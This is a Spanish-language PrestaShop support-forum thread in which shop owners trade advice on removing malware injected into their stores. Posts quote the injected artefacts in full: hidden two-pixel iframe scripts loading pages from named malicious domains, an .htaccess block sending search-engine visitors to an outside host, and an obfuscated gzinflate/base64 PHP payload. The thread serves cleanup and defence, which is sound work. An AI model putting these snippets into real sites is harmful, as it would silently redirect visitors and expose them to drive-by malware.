Jump to content

Ataques a nuestras web por favor ayuda de profesionales prestashop


Recommended Posts

<p>Hola estoy perdido me conmentan esto de mi hosting tengo que eliminar todo lo que pongo

 

Después de cerrar el body en el html tu web tiene un código que Google detecta como malicioso:

 

<script type="text/javascript">/* <![CDATA[ */

document.write('<iframe align="center" frameborder="no" height="2" name="Twitter" scrolling="auto" src="

Edited by elitemfitness (see edit history)
Link to comment
Share on other sites

Para comenzar, deberías indicarnos qué versión de Prestashop tienes instalada.

 

Supongo que tu problema por lo que describes no tiene nada que ver con este otro, ¿verdad?:

http://www.prestashop.com/forums/topic/125972-virus-en-prestashop/

 

Observando el código que nos has indicado como malicioso, parece que tiene que ver con algún módulo de Twitter. ¿Has comprobado si desactivando ese módulo (simplemente para hacer una comprobación), Google deja de incluir tu tienda de su lista negra?

 

Un saludo.

Link to comment
Share on other sites

Para comenzar, deberías indicarnos qué versión de Prestashop tienes instalada.

 

Supongo que tu problema por lo que describes no tiene nada que ver con este otro, ¿verdad?:

http://www.prestasho...-en-prestashop/

 

Observando el código que nos has indicado como malicioso, parece que tiene que ver con algún módulo de Twitter. ¿Has comprobado si desactivando ese módulo (simplemente para hacer una comprobación), Google deja de incluir tu tienda de su lista negra?

 

Un saludo.

<p>hola gracias por tu ayuda tengo la ultima version de prestashop creo entender que hay algun modulo de twitter que introduce este codigo en theme y lo coloca en debug.tpl lo he eliminado barias vezes y nada sigue hay

 

<p><p>hola gracias por tu ayuda tengo la ultima version de prestashop creo entender que hay algun modulo de twitter que introduce este codigo en theme y lo coloca en debug.tpl lo he eliminado barias vezes y nada sigue hay

Link to comment
Share on other sites

Fichero header.tpl y footer.tpl de tu plantilla, busca esto:

 

<!--c3284d-->																																																		<script type="text/javascript">
document.write('<iframe src="http://
</script><!--/c3284d-->

 

Y cargatelo.

 

No se te olvide forzar compilación, después de realizar el cambio.

 

PD: En realidad, búscalo en todos los ficheros.

  • Like 1
Link to comment
Share on other sites

Fichero header.tpl y footer.tpl de tu plantilla, busca esto:

 

<!--c3284d-->																																																		<script type="text/javascript">
document.write('<iframe src="http://
</script><!--/c3284d-->

 

Y cargatelo.

 

No se te olvide forzar compilación, después de realizar el cambio.

 

elimino el codogo entero que me pones?

4estoy desesperado con esto pierdo muchos clientes gracias

 

 

google me comento esto

 

Software malintencionado

 

Google ha detectado código dañino en tu sitio. Aunque aún no se ha llegado a un estado crítico, te recomendamos que soluciones esta incidencia lo antes posible. De lo contrario, es posible que los usuarios de Google vean una página de advertencia al intentar visitar páginas de este sitio

A continuación, se muestran algunas de las páginas infectadas, pero no es suficiente eliminar estas páginas para limpiar tu sitio. Debes identificar y solucionar las vulnerabilidades subyacentes. Cómo limpiar tu sitio

Incidencia general

Algunas URL de este sitio redirigen a los navegadores a páginas que instalan software malintencionado, lo que indica que los servidores que alojan las páginas de este sitio pueden contener archivos de configuración modificados (como, por ejemplo, el archivo .htaccess de Apache).

Link to comment
Share on other sites

si esta como elimino y que elimino de todo esto muchas gracias

 

 

 

#c3284d#

<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)

RewriteRule ^(.*)$ http://torvaldscallthat.info/in.cgi?16 [R=301,L]

</IfModule>

#/c3284d#

# .htaccess automaticaly generated by PrestaShop e-commerce open-source solution

# WARNING: PLEASE DO NOT MODIFY THIS FILE MANUALLY. IF NECESSARY, ADD YOUR SPECIFIC CONFIGURATION WITH THE HTACCESS GENERATOR IN BACK OFFICE

# http://www.prestashop.com - http://www.prestashop.com/forums

 

 

<IfModule mod_rewrite.c>

# URL rewriting module activation

RewriteEngine on

 

# URL rewriting rules

RewriteRule ^([a-z0-9]+)\-([a-z0-9]+)(\-[_a-zA-Z0-9-]*)/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1-$2$3.jpg [L]

RewriteRule ^([0-9]+)\-([0-9]+)/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1-$2.jpg [L]

RewriteRule ^([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$1$2.jpg [L]

RewriteRule ^([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$2/$1$2$3.jpg [L]

RewriteRule ^([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$2/$3/$1$2$3$4.jpg [L]

RewriteRule ^([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$2/$3/$4/$1$2$3$4$5.jpg [L]

RewriteRule ^([0-9])([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$2/$3/$4/$5/$1$2$3$4$5$6.jpg [L]

RewriteRule ^([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$2/$3/$4/$5/$6/$1$2$3$4$5$6$7.jpg [L]

RewriteRule ^([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$2/$3/$4/$5/$6/$7/$1$2$3$4$5$6$7$8.jpg [L]

RewriteRule ^([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?/[_a-zA-Z0-9-]*\.jpg$ /img/p/$1/$2/$3/$4/$5/$6/$7/$8/$1$2$3$4$5$6$7$8$9.jpg [L]

RewriteRule ^c/([0-9]+)(\-[_a-zA-Z0-9-]*)/[_a-zA-Z0-9-]*\.jpg$ /img/c/$1$2.jpg [L]

RewriteRule ^c/([a-zA-Z-]+)/[a-zA-Z0-9-]+\.jpg$ /img/c/$1.jpg [L]

RewriteRule ^([0-9]+)(\-[_a-zA-Z0-9-]*)/[_a-zA-Z0-9-]*\.jpg$ /img/c/$1$2.jpg [L]

RewriteRule ^([0-9]+)\-[a-zA-Z0-9-]*\.html /product.php?id_product=$1 [QSA,L]

RewriteRule ^[a-zA-Z0-9-]*/([0-9]+)\-[a-zA-Z0-9-]*\.html /product.php?id_product=$1 [QSA,L]

RewriteRule ^([0-9]+)\-[a-zA-Z0-9-]*(/[a-zA-Z0-9-]*)+ /category.php?id_category=$1&noredirect=1 [QSA,L]

RewriteRule ^([0-9]+)\-[a-zA-Z0-9-]* /category.php?id_category=$1 [QSA,L]

RewriteRule ^([0-9]+)__([a-zA-Z0-9-]*) /supplier.php?id_supplier=$1 [QSA,L]

RewriteRule ^([0-9]+)_([a-zA-Z0-9-]*) /manufacturer.php?id_manufacturer=$1 [QSA,L]

RewriteRule ^content/([0-9]+)\-([a-zA-Z0-9-]*) /cms.php?id_cms=$1 [QSA,L]

RewriteRule ^content/category/([0-9]+)\-([a-zA-Z0-9-]*) /cms.php?id_cms_category=$1 [QSA,L]

RewriteRule ^pagina-no-encuentra$ /404.php [QSA,L]

RewriteRule ^direccion$ /address.php [QSA,L]

RewriteRule ^direcciones$ /addresses.php [QSA,L]

RewriteRule ^autenticacion$ /authentication.php [QSA,L]

RewriteRule ^mas-vendidos$ /best-sales.php [QSA,L]

RewriteRule ^carro-de-la-compra$ /cart.php [QSA,L]

RewriteRule ^contactenos$ /contact-form.php [QSA,L]

RewriteRule ^descuento$ /discount.php [QSA,L]

RewriteRule ^estado-pedido$ /guest-tracking.php [QSA,L]

RewriteRule ^historial-de-pedidos$ /history.php [QSA,L]

RewriteRule ^identidad$ /identity.php [QSA,L]

RewriteRule ^fabricantes$ /manufacturer.php [QSA,L]

RewriteRule ^mi-cuenta$ /my-account.php [QSA,L]

RewriteRule ^nuevos-productos$ /new-products.php [QSA,L]

RewriteRule ^carrito$ /order.php [QSA,L]

RewriteRule ^devolucion-de-productos$ /order-follow.php [QSA,L]

RewriteRule ^pedido-rapido$ /order-opc.php [QSA,L]

RewriteRule ^vales$ /order-slip.php [QSA,L]

RewriteRule ^contrasena-olvidado$ /password.php [QSA,L]

RewriteRule ^promocion$ /prices-drop.php [QSA,L]

RewriteRule ^buscar$ /search.php [QSA,L]

RewriteRule ^mapa-del-sitio$ /sitemap.php [QSA,L]

RewriteRule ^tiendas$ /stores.php [QSA,L]

RewriteRule ^proveedores$ /supplier.php [QSA,L]

</IfModule>

 

# Catch 404 errors

ErrorDocument 404 /404.php

 

<IfModule mod_expires.c>

ExpiresActive On

ExpiresByType image/gif "access plus 1 month"

ExpiresByType image/jpeg "access plus 1 month"

ExpiresByType image/png "access plus 1 month"

ExpiresByType text/css "access plus 1 week"

ExpiresByType text/javascript "access plus 1 week"

ExpiresByType application/javascript "access plus 1 week"

ExpiresByType application/x-javascript "access plus 1 week"

ExpiresByType image/x-icon "access plus 1 year"

</IfModule>

 

FileETag INode MTime Size

<IfModule mod_deflate.c>

AddOutputFilterByType DEFLATE text/html

AddOutputFilterByType DEFLATE text/css

AddOutputFilterByType DEFLATE text/javascript

AddOutputFilterByType DEFLATE application/javascript

AddOutputFilterByType DEFLATE application/x-javascript

</IfModule>

Link to comment
Share on other sites

Vuelve a generar el archico .htaccess desde Herramientas / Generadores . Tienes un redireccionamiento a torvaldscallthat.info.

Asegurate de no tener ninguna referencia a ese enlace o a cualquier otro en el campo de Configuración especifica al generar el .htaccess

Edited by wurrumin (see edit history)
Link to comment
Share on other sites

Una cosa más, estos días hemos detectado por clientes que han sido atacados que una vulnerabilidad en Plesk (http://www.parallels.com/es/products/plesk/) permite meter inyecciones javascript de malware en Prestashop. Los ficheros afectados son js de módulos y del theme. Lo digo por si os pasa. Es tan fácil como borrar el js malicioso, que los sysadmin instalen el parche en el plesk y ala. Pero yo huiría de Plesk, siempre :)

Link to comment
Share on other sites

Hola, estoy teniendo un problema similar con la inyección de código entre esas etiquetas <!--/c3284d-->. En principio he limpiado todo el sitio localizando el código con WindowsGrep, pero sigue saliendo el código. Mi Prestashop afectado es la versión 1.3.7.

 

¿como puedo forzar la compilación desde esta versión ya que no aparece esa opción en el backend?

Link to comment
Share on other sites

Gracias por la rapidez. No he encontrado esas líneas en mi versión de PS.

 

En cualquier caso, me faltaba localizar también la cadena #c3284d#

 

En principio parece que ya no inyecta ningún código, sólo me falta revisar un par de tiendas más afectadas por lo mismo y pedir revisión a Mr Google...

 

Saludos.

Link to comment
Share on other sites

Puedes pegar el contenido del fichero smarty config?

 

 

<?php

 

require_once(_PS_SMARTY_DIR_.'Smarty.class.php');

$smarty = new Smarty();

$smarty->template_dir = _PS_THEME_DIR_.'tpl';

$smarty->compile_dir = _PS_SMARTY_DIR_.'compile';

$smarty->cache_dir = _PS_SMARTY_DIR_.'cache';

$smarty->config_dir = _PS_SMARTY_DIR_.'configs';

$smarty->caching = false;

$smarty->force_compile = true; // to pass "false" when put into production

$smarty->compile_check = false;

//$smarty->debugging = true;

$smarty->debug_tpl = _PS_ALL_THEMES_DIR_ . 'debug.tpl';

 

function smartyTranslate($params, &$smarty)

{

/*

* Warning : 2 lines have been added to the Smarty class.

* "public $currentTemplate = null;" into the class itself

* "$this->currentTemplate = Tools::substr(basename($resource_name), 0, -4);" into the "display" method

*/

global $_LANG, $_MODULES, $cookie, $_MODULE;

if (!isset($params['js'])) $params['js'] = 0;

if (!isset($params['mod'])) $params['mod'] = false;

$msg = false;

 

$string = str_replace('\'', '\\\'', $params['s']);

$key = $smarty->currentTemplate.'_'.md5($string);

if ($params['mod'])

{

$iso = Language::getIsoById($cookie->id_lang);

 

if (Tools::file_exists_cache(_PS_THEME_DIR_.'modules/'.$params['mod'].'/'.$iso.'.php'))

{

$translationsFile = _PS_THEME_DIR_.'modules/'.$params['mod'].'/'.$iso.'.php';

$modKey = '<{'.$params['mod'].'}'._THEME_NAME_.'>'.$key;

}

else

{

$translationsFile = _PS_MODULE_DIR_.$params['mod'].'/'.$iso.'.php';

$modKey = '<{'.$params['mod'].'}prestashop>'.$key;

}

 

if (@include_once($translationsFile))

$_MODULES = array_merge($_MODULES, $_MODULE);

 

$msg = (is_array($_MODULES) AND key_exists($modKey, $_MODULES)) ? ($params['js'] ? addslashes($_MODULES[$modKey]) : stripslashes($_MODULES[$modKey])) : false;

}

if (!$msg)

$msg = (is_array($_LANG) AND key_exists($key, $_LANG)) ? ($params['js'] ? addslashes($_LANG[$key]) : stripslashes($_LANG[$key])) : $params['s'];

return ($params['js'] ? $msg : Tools::htmlentitiesUTF8($msg));

}

$smarty->register_function('l', 'smartyTranslate');

 

function smartyDieObject($params, &$smarty)

{

return Tools::D($params['var']);

}

$smarty->register_function('d', 'smartyDieObject');

 

function smartyShowObject($params, &$smarty)

{

return Tools::P($params['var']);

}

$smarty->register_function('p', 'smartyShowObject');

 

function smartyMaxWords($params, &$smarty)

{

$params['s'] = str_replace('...', ' ...', html_entity_decode($params['s'], ENT_QUOTES, 'UTF-8'));

$words = explode(' ', $params['s']);

 

foreach($words AS &$word)

if(Tools::strlen($word) > $params['n'])

$word = Tools::substr(trim(chunk_split($word, $params['n']-1, '- ')), 0, -1);

 

return implode(' ', Tools::htmlentitiesUTF8($words));

}

 

$smarty->register_function('m', 'smartyMaxWords');

 

function smartyTruncate($params, &$smarty)

{

$text = isset($params['strip']) ? strip_tags($params['text']) : $params['text'];

$length = $params['length'];

$sep = isset($params['sep']) ? $params['sep'] : '...';

 

if (Tools::strlen($text) > $length + Tools::strlen($sep))

$text = Tools::substr($text, 0, $length).$sep;

 

return (isset($params['encode']) ? Tools::htmlentitiesUTF8($text, ENT_NOQUOTES) : $text);

}

 

$smarty->register_function('t', 'smartyTruncate');

 

function smarty_modifier_truncate($string, $length = 80, $etc = '...',

$break_words = false, $middle = false, $charset = 'UTF-8')

{

if ($length == 0)

return '';

 

if (Tools::strlen($string) > $length) {

$length -= min($length, Tools::strlen($etc));

if (!$break_words && !$middle) {

$string = preg_replace('/\s+?(\S+)?$/u', '', Tools::substr($string, 0, $length+1, $charset));

}

if(!$middle) {

return Tools::substr($string, 0, $length, $charset) . $etc;

} else {

return Tools::substr($string, 0, $length/2, $charset) . $etc . Tools::substr($string, -$length/2, $charset);

}

} else {

return $string;

}

}

 

$smarty->register_modifier('truncate', 'smarty_modifier_truncate');

$smarty->register_modifier('secureReferrer', array('Tools', 'secureReferrer'));

 

global $link;

 

$link = new Link();

$smarty->assign('link', $link);

 

?>

Link to comment
Share on other sites

es este: $smarty->force_compile = true; // to pass "false" when put into production

 

Para recompilar

 

$smarty->force_compile = true; // to pass "false" when put into production

 

Para optimizar

 

$smarty->force_compile = false; // to pass "false" when put into production

  • Like 1
Link to comment
Share on other sites

Buenas tardes, antes de nada quiero dar las gracias tanto al moderador de este hilo como a todos aquellos que dedicáis un poco de vuestro valioso tiempo a ayudar a gente como yo que no tiene mucha idea de este tema, pero que tiene muchas ganas de aprender y poder ayudar a otros, dicho esto os cuento mi experiencia con este hilo.

 

ayer sufrí el mismo ataque que los compañeros que han posteado, he seguido los pasos que amablemente habeis indicado y he procedido a buscar el código maligno que he encontrado en los Ficheros header.tpl y footer.tpl del tema que tengo puesto y ojo en la plantilla que trae por defecto prestashop he generado el fichero htaccess,

las cuestiones que os planteo son las siguientes:

a) el resto de compañeros que os a pasado este problema habeis encontrado algún rastro de este código en otros ficheros que no sean estos últimos que he indicado, si a sido a si, cuales son, olvide decir la versión del presta la 1.4.6.2

 

b)después de realizar las indicaciones que amablemente nos ofrecéis, en la mayoría de los buscadores no hay problema pero en chrome cuando entras a la web sale una pagina avisando de que tenemos este problema, ya pedí la revisión a google , sabéis cuanto tarda?

 

c) algo importante para mi, sabéis como diablos a podido entrar eso al ftp ando loco con la incertidumbre de saber si se puede volver a repetir puesto que además de esta tienda tarimasdeducha.es, tenemos otras dos mas que afortunadamente no han sido atacadas.

 

un saludo y gracias otra vez

Link to comment
Share on other sites

Hola tutmosis. Te sugiero que pongas la url de tu site aquí: sitecheck.sucuri.net/scanner/ y busques en todo el site la cadena de código que te indiquen. Normalmente estos ataques se focalizan en archivos js y tpl. Recuerda recompilar las plantillas activando la compilación en la back si tienes pshop 1.4 o superior.

 

Suerte!

Link to comment
Share on other sites

Hola y gracias a todos por la ayuda sin bosotros los navatillos estariamos perdidos.

 

yo tengo el mismo problema en 5 tiendas

hace unos dias detecte esto en mis tiendas un compañero de este foro me ayudo a elimenar todo esto y atencion los encontre en

 

theme/debug.tpl y dentro de la carpeta theme en footer.tpl y headre.tpl lo elimine de mis 5 tiendas y despues de unos 4 dias an buelto a salir alguna solucion por que estoy muy preocupado

 

conoceis este modulo gratuito

http://addons.prestashop.com/es/administration/1417-protect-your-templates--protegez-vos-themes.html&adforum

 

 

<!--c3284d--> <script type="text/javascript">

document.write('<iframe src="http://24-procent.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

</script><!--/c3284d-->

 

gracias

Edited by elitemfitness (see edit history)
Link to comment
Share on other sites

pues nada yo llevo dos días con esta leche le he quitado casi 165 ficheros con el código, y ya no me detecta el código al pasarle el avas estoy negro, mi web esta en ovh y las tullas elitemfitness,

 

cuando descubráis lo que sea pasarlo por aquí

 

muchas gracias jordiob he seguido tus instrucciones y la primera vez que la pase por este sitio me dio 165 problemas después de limpiarla con mis limitados conocimientos me dice que solo esta, que te parece.

 

 

error.pngBlacklisted: Yes check.pngMalware: No check.pngMalicious javascript: No check.pngMalicious iFrames: No check.pngDrive-By Downloads: No check.pngAnomaly detection: No check.pngIE-only attacks: No check.pngSuspicious redirections: No check.pngSpam: No

 

 

 

muchas gracias.

Link to comment
Share on other sites

estaria bien que digeras en que carpetas tienes ese codigo para conparar las mias

yo e formateado mo pc el avast perfecto spybot perfecto etc..

no se que cñ es esto mero estoy negro mis clientes entra en mi web y les redirige a otras

necesitamos ayuda lo mas urgente posible de prestashop

gracias

Link to comment
Share on other sites

Hola.

 

Yo antes de ponerme a borrar código malicioso emplearía mi tiempo en saber cómo han entrado y cómo poner remedio.

 

Después me pondría a borrar código malicioso y a hacer un análisis del sistema para detectar otras posibles sorpresas que nos hayan dejado y que no esté tan a la vista como un js.

 

un saludo

Link to comment
Share on other sites

Hola yo tenia la carpeta mails bastante mal y algunos mas en algunos módulos de mi tema cool - putih

y en el theme prestashop también tenia bicho el avas me dio 165 incidencias del código este,

 

yo lo que he hecho es vajarme la carpeta www de mi ftp entera y pasar el avas en la opción de analizar carpetas y parece ser que ahora y después de limpiarla solo me dicen que estoy en la lista negra de google, ya pedí revision a ver que pasa.

 

MUY importante lo que dice oka todavía no sabemos como y por donde a entrado este :ph34r:

Link to comment
Share on other sites

Avisad a los administradores de vuestro servidor y que pongan parches de seguridad, es lo mejor para prevenir estos ataques. No es un tema de tener la última versión de Prestashop, pues los 1.4.8.2 también están siendo atacados.

Link to comment
Share on other sites

muchas gracias jordiob he seguido tus instrucciones y la primera vez que la pase por este sitio me dio 165 problemas después de limpiarla con mis limitados conocimientos me dice que solo esta, que te parece.

 

De nada! para eso estamos.

 

El proceso para detectar/limpiar el site que yo uso es el siguiente

 

1- Entrar en http://sitecheck.sucuri.net/scanner/ y analizar el site

2- Copiar la cadena de búsqueda que encuentre sucuri de código malicioso

3- Bajarse todo el contenido del site en local

4- Usando Dreamweaver o Eclipse, haced un site/proyecto nuevo y haced una búsqueda global en el site buscando la cadena de código malicioso.

5- Borrar ese código y resubir los archivos al servidor

6- Activar compilación smarty y entrar en todas las páginas de TPLs afectadas

7- Pasar de nuevo el site por sucuri. En paralelo avisar a los admins del servidor, informarles del ataque y que pongan los parches de seguridad necesarios. Normalmente las vulnerabilidades son del panel de control.

 

Recordad que esto no es un virus que tengáis en local, que afecte a las plantillas y que las suba al servidor. Este es un malware que ataca al servidor donde tenéis el site y añade el código malicioso.

 

Suerte! :)

Link to comment
Share on other sites

Hola.

 

No sé qué ataque estáis recibiendo, creo que un compañero puso más arriba que había unos avisos de seguridad con Cpanel.

 

De todo el software que uséis en las tiendas tenéis que estar apuntados a sus listas y avisos de seguridad, no vale tener el prestashop actualizado a la última versión y tener un phpmyadmin vulnerable abierto a todo el mundo.

 

Al ser un ataque claramente automatizado estáis de suerte, será un bug en algún software que uséis y que sea bastante conocido, el fabricante del software afectado seguramente haya sacado ya un parche que lo solucione.

 

Después de resolverlo miraría poner mod_security como firewall en Apache y un aide para monitorizar con firma md5 todos los archivos de prestashop.

 

Un saludo.

Link to comment
Share on other sites

pues nada no hay manera de eliminarlo por completo lo limpio de todo elimino todo y a las horas esta hay otra vez

si esto no lo soluciona alguien directo de prestashop no se como se solucionara

gracias

 

Hola, el problema seguramente esté en otro software que no tiene nada que ver con prestashop (aunque no pongo la mano en el fuego después de leer cosas como ésta: http://webcoder.biz/blog/prestashop-cross-site-scriptingxss-vulnerability/ )

 

Ya lo comenté antes, borrar el código malicioso es inútil si antes no has solucionado el bug que ha permitido la entrada del "bicho".

 

El bug puede estar en un phpmyadmin, un cpanel un plesk bufff a saber, sólo tú sabes qué software usas en tu plataforma.

 

Si estás en un hosting administrado deberás pedir soporte a ellos y pedirles que actualicen sus sistemas a los últimos parches de seguridad.

 

Aún así el "bicho" bien podría haber dejado una puerta trasera en la máquina y todo lo que he comentado antes no valdría para nada, toca también hacer una revisión de la máquina.

 

un saludo.

Link to comment
Share on other sites

e formateado mi pc e eliminado todo los bichos e pasado antivirus y malwarw etc.. lo e comentado con mi hosting y lo unico que me dicen que lo elimine todo tengo 5 tiendas afectadas por esto si esto no lo cojen directos de prestashop no se como cñ se va a solucionar gracias

Edited by elitemfitness (see edit history)
Link to comment
Share on other sites

Estoy con el mismo problema... :( Siguiendo el post borre el codigo que me marcaba la herramienta de webmaster de google, todo bien pero ahora veo que me va marcando URL nuevas afectadas y vuelvo a mirar el header.tpl. y footer.tpl y vuelve a estar hay el codigo, el codigo que me indica es este:

 

<script type="text/javascript">

document.write('<iframe src="http://archivingmini.info/in.cg

i?16" name="Twitter" scrolling="auto" frameborder="no" align

="center" height="2" width="2"></iframe>');

</script>

 

Pensaba que era culpa del modulo pie de pagina buhoc pero veo gente con este problema no tiene ese modulo.

 

Como indica jordiob entre en la pagina: http://sitecheck.sucuri.net/scanner/

 

Y esto es lo que me dice:

 

web site: centralseeds.com

status: Site infected with malware

web trust: Not Blacklisted

warn:

 

Plesk version 10 outdated: Upgrade required.

 

Y el codigo malicioso que me reporta en todas mas o menos es este:

 

<iframe src="http://whitecada.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2">

 

 

Necesito ayuda!!

 

No hay ningun modulo gratuito o no para impedir estas cosas?

Edited by lirelok (see edit history)
Link to comment
Share on other sites

esto es lo que me comenta mi hosting

 

Buenos días,

 

Los parches de seguridad deben aplicarse al Prestashop, no al servidor. En el servidor utilizamos mod_security que se trata de un módulo del servidor Web Apache que filtra una gran cantidad de ataques conocidos de la mayoría de aplicaciones. Pero por nuestra parte no podemos hacer más, la seguridad pasa por tener las aplicaciones instaladas y utilizar contraseñas seguras.

 

Como te indicamos no vemos incidencia a solucionar por nuestra parte.

 

Un saludo.

 

es muy importante que todos los que tengais este problema paseis en las carpetas que lo aveis encontrado para poder contrastar con los demas

un saludo

Edited by elitemfitness (see edit history)
Link to comment
Share on other sites

Bueno yo tambien lo comente al hosting esta mañana y me dicen que era un fallo que solventan con una actualizacion que a salido para prestashop, que segun dice me a puesto en ese momento, me paso el link de la actualizacion pero no lo guarde, luego se lo pregunto y te lo paso, segun ellos con eso se debe arreglar esa vulneravilidad... ojala sea asi... la compañia que tengo de hosting es loading.

 

Pero bueno ahora habra que erradicar todo el codigo que a entrado, yo estoy buscando por encima y demomento solo e visto el codigo en el header.tpl y footer.tpl, aunque tambien veo este en el index.php de mi plantilla que realmente no se si es malicioso o no, es este:

 

#c3284d#

echo(gzinflate(base64_decode("3Y5BDsIgEEX3TXoHMpvqpkQXLhTwEl4AAWFMCw2dit5eam/hrCb//3nzGfuPEbPJOBGjz+QkkHsTf+qX3lRQbWOTWUYXqS8Zye06gY+sR8fmbCQEounMeQnVMtrqPi8cY288Xg8nYLEGJdwKErkMrELTMGD0EvRCCdiPdE/ZuiwhVkEP6KMEU/+tB8GhDyThCKygpbBuSvCtger2l7YRfKuqvg==")));

#/c3284d#

Link to comment
Share on other sites

e encontrado codigo malicioso tambien en los archivos:

 

restricted-country.tpl

maintenance.tpl

debug.tpl (esta fuera de la carpeta del theme)

 

Por el momneto e revisado todos los archivos tpl de la carpeta del theme y los archivos js.

Edited by lirelok (see edit history)
Link to comment
Share on other sites

hola jordi, en herramientas de webmaster de google me indican 4 URL problematicas, en detalles te indica cual es el codigo maligno..xD pero indica donde se encuentra?

 

luego tambien veo un scrpt instalado en mi web que es un buscador de bing, solo se ve en dispositivos mobiles, aunque con el nocript lo detecto en mi ordenador, esto tambien se me a instalado por la cara, pero no consigo ver donde esta ese codigo para eliminarlo.

 

esta es mi web: http://www.centralseeds.com

Link to comment
Share on other sites

hola jordi, en herramientas de webmaster de google me indican 4 URL problematicas, en detalles te indica cual es el codigo maligno..xD pero indica donde se encuentra?

 

luego tambien veo un scrpt instalado en mi web que es un buscador de bing, solo se ve en dispositivos mobiles, aunque con el nocript lo detecto en mi ordenador, esto tambien se me a instalado por la cara, pero no consigo ver donde esta ese codigo para eliminarlo.

 

esta es mi web: http://www.centralseeds.com

 

Aquí tienes las páginas infectadas: http://sitecheck.sucuri.net/results/www.centralseeds.com/ que son shopping-cart.tpl y cms.tpl y las de order-XXX.tpl

Link to comment
Share on other sites

oki entonces esque la pagina esa que hace el scan tarda en ver la modificaciones, porque ya no hay nada en esos archivos, aunque cuando miro con el firebug el script de la pagina web sigue saliendo codigo malicioso.... no se donde debe estar, esto me tiene loco.....

Link to comment
Share on other sites

oki pero me da que todavia faltan cosas, porque me sale mirandolo con el mobil un buscador de bing que se a metido hay por la cara y que no consigo sacar, algun programa parecido al firebug para el mobil? xD esque es el unico sitio donde puedo ver de donde sale eso, o de alguna manera el noscript me puede dar el script de esa funcion? lo unico que veo que puedo hacer con el es permitir bing.com o no permitir.

Link to comment
Share on other sites

Mas tarde colgare las carpetas donde se introducen estos códigos yo eliminando todo y desinstalando los módulos de twitter hasta el momento después de mas de 16h no sea introducido otra vez (antes eliminabas y alas 2 o 3h estaba hay otra vez)

 

es muy importante revisar carpeta por carpeta tanto php como tpl todas todas si las eliminas por completo solucionado o eso espero

 

un saludo

 

esto contestan desde mi hosting

 

Los parches de seguridad deben aplicarse al Prestashop, no al servidor. En el servidor utilizamos mod_security que se trata de un módulo del servidor Web Apache que filtra una gran cantidad de ataques conocidos de la mayoría de aplicaciones. Pero por nuestra parte no podemos hacer más, la seguridad pasa por tener las aplicaciones instaladas y utilizar contraseñas seguras.

 

Como te indicamos no vemos incidencia a solucionar por nuestra parte.

 

Un saludo.

Edited by elitemfitness (see edit history)
Link to comment
Share on other sites

un poco de paciencia despues de 16h eliminando todo de todas las carpetas una por una no me a salido mas estoy instalando otra vez el modulo de twitter aver que pasa esperare hasta mañana.

consejo personal no hay otra manera que eliminar de todas las carpetas de los archivos php y tpl revisalas una por una

( si eliminais todo y dejais por descuido una el cualquier carpeta saldra otra vez )

un saludo

Edited by elitemfitness (see edit history)
  • Like 1
Link to comment
Share on other sites

oki pues esperamos a ver donde indicas que estan, dices que desintalaste el modulo de twitter, tienes el modulo pie de pagina buhoc? yo es el que tengo que lleva el tema de twitter.

 

no tengo ese modulo tengo otro de twitter

teneis que hacer pruevas este codigo entra por algun lado

Edited by elitemfitness (see edit history)
  • Like 1
Link to comment
Share on other sites

Bueno os paso donde yo e encontrado este código pido por favor a toda la comunidad que si lo localizamos en otras carpetas lo publiquéis

 

codigo a localizar en mi caso

 

<!--c3284d--> <script type="text/javascript">

document.write('<iframe src="http://torvaldscallthat.info/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

</script><!--/c3284d-->

 

se encuentra en

 

public/.htaccess

 

